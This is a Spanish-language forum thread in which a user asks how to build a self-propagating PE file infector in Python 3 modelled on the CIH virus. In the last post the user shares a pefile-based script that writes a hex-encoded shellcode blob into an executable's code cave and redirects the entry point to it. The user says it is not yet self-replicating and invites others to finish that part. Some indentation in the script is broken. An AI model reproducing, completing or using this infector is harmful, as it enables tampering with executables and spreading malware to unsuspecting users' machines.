infecciona de archivos PE con python 3

Iniciado por el etrno, 6 Septiembre 2020, 06:56 AM

0 Miembros y 1 Visitante están viendo este tema.

el etrno

estoy trabajando en un proyecto y tome inspiración del virus cih concreta mente su método de propagación el propósito es que le virus modifique todos los archivos .exe para que si se ejecuta en otra maquina esta queda infectada causando una propagación efectiva se que la librería PEFile da herramientas para modificar ejecutable pero no se haya información de lo que quiero hacer por eso pregunto si alguien sabe como hacerlos los parámetros son: permitir infectar los archivos .exe para que el virus se propague, no requerir de instalar programas externos tiene que poder funciona en una maquina infectada para continuar la propagación, estar escrito en python 3. agradezco cualquier ayuda

MCKSys Argentina

Cita de: el etrno en  6 Septiembre 2020, 06:56 AM
... no requerir de instalar programas externos ...

Cita de: el etrno en  6 Septiembre 2020, 06:56 AM
... estar escrito en python 3 ...

Te estás contradiciendo. Python (2 o 3) no viene instalado en Windows por defecto.

De todas formas, lo que tienes que saber es qué hacer para infectar el binario y luego hacer que el virus haga lo mismo usando la lib que quieras. Por supuesto, anexar/reemplazar codigo a un EXE requiere de cierto trabajo.

La libreria para manejo de PE de Python es bastante sencilla de usar, si conoces como funciona el formato PE.

Saludos!
MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."


el etrno

No me contradigo solo no me explique bien el código debe ser de python 3 (mas por comodidad que otra cosa) pero lo voy a compila para crear un ejecutable .exe (un ejecutable portable o PE) con lo de no usar programas externos me refiero a no requerir que la victima instale nada (aparte del propio virus claro) toda la información que e encontrado es de como usar un programa X para infectar un ejecutable con mi virus no de como hace que mi virus sea el que infecta los archivos. Estoy haciendo experimentos por mi parte pero no estoy acostumbrado a los archivos ejecutables de windows (suelos usar linux para casi todo por lo que solo es falta de costumbre)

hazzard_AV

Para empezar talvez seria mas sencillo que programes un binder dentro del propio virus? La verdad desconozco del metodo que estas hablando pero un binder suena como una solucion posible.
Por otro lado me interesa el tema asique espero con ansias que publiques alguna actualizacion.
saludos

el etrno

actualización cree un programa que hace lo que dijefrom pefile import PE
from struct import pack

sample_shell_code = ("\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +
"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +
"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +
"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +
"\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01" +
"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d" +
"\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01" +
"\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" +
"\xe8\x89\x44\x24\x1c\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89" +
"\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45" +
"\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff" +
"\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64" +
"\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56\xff\x55" +
"\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52\xe8" +
"\x61\xff\xff\xff\x68\x21\x58\x20\x20\x68\x57\x30\x30\x74" +
"\x31\xdb\x88\x5c\x24\x05\x89\xe3\x68\x65\x21\x58\x20\x68" +
"\x20\x48\x65\x72\x68\x20\x57\x61\x73\x68\x73\x69\x73\x68" +
"\x68\x44\x65\x62\x61\x31\xc9\x88\x4c\x24\x12\x89\xe1\x31" +
"\xd2\x52\x53\x51\x52\xff\xd0")
if __name__ == '__main__':
exe_file = input('[*] Ingrese la ruta completa del ejecutable principal:')
final_pe_file = input('[*] Ingrese la ruta completa del ejecutable de salida:')
pe = PE(exe_file)
OEP = pe.OPTIONAL_HEADER.AddressOfEntryPoint
pe_sections = pe.get_section_by_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint)
align = pe.OPTIONAL_HEADER.SectionAlignment
what_left = (pe_sections.VirtualAddress + pe_sections.Misc_VirtualSize) - pe.OPTIONAL_HEADER.AddressOfEntryPoint
end_rva = pe.OPTIONAL_HEADER.AddressOfEntryPoint + what_left
padd = align - (end_rva % align)
e_offset = pe.get_offset_from_rva(end_rva+padd) - 1
scode_size = len(sample_shell_code)+7
if padd < scode_size:
    # No hay suficiente espacio disponible para shellcode
exit()
# El código se puede inyectar
scode_end_off = e_offset
scode_start_off = scode_end_off - scode_size
pe.OPTIONAL_HEADER.AddressOfEntryPoint = pe.get_rva_from_offset(scode_start_off)
raw_pe_data = pe.write()
jmp_to = OEP - pe.get_rva_from_offset(scode_end_off)
sample_shell_code = '\x60%s\x61\xe9%s' % (sample_shell_code, pack('I', jmp_to & 0xffffffff))
final_data = list(raw_pe_data)
final_data[scode_start_off:scode_start_off+len(sample_shell_code)] = sample_shell_code
final_data = ''.join(final_data)
raw_pe_data = final_data
pe.close()
new_file = open(final_pe_file, 'wb')
new_file.write(raw_pe_data)
new_file.close()
print ('[*] Trabajo terminado! :)')

lo escribí en Python 2 y lo estoy pasando a Python 3 probablemente tenga problemas es casi seguro que ahora mismo tenga código que solo funciona en Python 2 si notan alguna me avisan además no estoy seguro de si sirve en ejecutables de 64 bits en resumen este programa hace: 1 busca si el ejecutable tiene el espacio para el shellcode 2 si el espacio es insuficiente responde espacio insuficiente si el espacio es suficiente 3 modifica el ejecutable para que al usarlo se ejecute el shellcode.
en resumen solo convierte tu virus a un .exe y ya tienes tu shellcode la razón por la que no lo e hecho auto replicante aun es que no quiero problemas con mis archivos pero estoy seguro de que averiguaran como hacerlo solo se necesita un poco de ingenio  ;-) ahora no e dormido en casi una semana y estoy asta los huevos de esta mier*a  >:D, pero aun no termino voy a crear uno que use fuerza bruta y a reparar el código espero que me ayuden a pasar esta cosa a Python 3